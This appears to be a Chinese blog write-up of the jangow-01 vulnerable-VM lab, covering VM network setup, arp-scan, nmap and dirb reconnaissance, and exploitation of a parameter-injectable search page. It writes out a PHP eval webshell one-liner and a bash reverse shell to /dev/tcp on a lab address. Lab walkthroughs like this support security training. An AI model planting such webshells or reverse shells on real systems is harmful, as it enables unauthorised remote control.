jangow-01-1.0.1靶机攻略

一.环境准备

1.1jangow靶机环境准备

1.1.1首先将我们解压好的的jangow-01-1.0.1.ova放入虚拟机里,并配置环境,安装好靶机后打开进行配置,按住shift,在界面按e进去得到图二。
1.1.2将ro 替换为 rw signie init=/bin/bash
1.1.3按住ctrl+x,ip a查看网卡信息,修改配置文件网卡信息
1.1.4编辑配置文件网卡信息, 英文键盘的斜杠按不出来,需要按数字键盘的斜杠,修改为如图所示内容后按shift+?然后输入wq点击回车退出,重启靶场

二.信息搜集

2.1ip搜集

2.1.1arp-scan -l 扫描靶机ip,发现靶机ip为192.168.182.138

2.2端口扫描

2.2.1使用nmap工具对目标机进行端口扫描,发现开启了80,21端口
2.2.2访问80,看有无有用信息,点击site
2.2.3依次点击,About,Projects,点击Buscar时,发现Buscar页面的url可以传参

2.3目录扫描

2.3.1使用kali的dirb进行目录扫描

三.漏洞利用

3.1输入一句话木马到1.php文件中,查看我们的1.php是否生效,访问http://192.168.182.138/site/1.php,发现生效

echo '<?php eval($_POST["cmd"]);' > 1.php

3.2复制绝对路径,去蚁剑连接

3,3在kali开启监听并触发反弹shell

在虚拟终端中输入

/bin/bash -c 'bash -i >& /dev/tcp/192.168.182.130/443 0>&1'

触发成功

jangow靶机练习到此结束

2025.7.27 17:20

相关推荐
搞科研的小刘选手15 分钟前
【高届数传感机电会议】第十二届传感器、机电一体化和自动化系统国际学术研讨会(ISSMAS 2026)
运维·人工智能·自动化·控制·传感器·传感·机电
楼兰公子32 分钟前
读取rpi摄像头
linux·服务器·算法
李景琰37 分钟前
Debian12安装配置Mqtt之EMQX
linux·运维·服务器
SimLine芯见38 分钟前
专为空管环境打造的KVM切换器,满足主备自动化高速无缝切换需求
运维·自动化
测试员周周40 分钟前
【AI测试系统】第1篇:LangGraph 实战:用 State Graph 搭建 AI测试流水线(4 步编排 + RAG 增强 + 完整代码)
linux·windows·python·功能测试·microsoft·单元测试·多轮对话
不做无法实现的梦~1 小时前
PX4 机载电脑 Linux 环境安装、串口、网络、ROS 完整配置
linux·运维·网络
嵌入式×边缘AI:打怪升级日志1 小时前
嵌入式Linux开发(了解交叉编译工具链的组成)
java·linux·运维
IT界的老黄牛1 小时前
停电后 Redis 集群两节点起不来:fix 完还报 Bad file format?多部分 AOF 修复的正确姿势
运维·redis·缓存
接着奏乐接着舞1 小时前
3D Tiles tileset.jso 数据格式
运维·服务器·3d
李小白202002021 小时前
RK3568 linux6.1 死机
linux·运维·服务器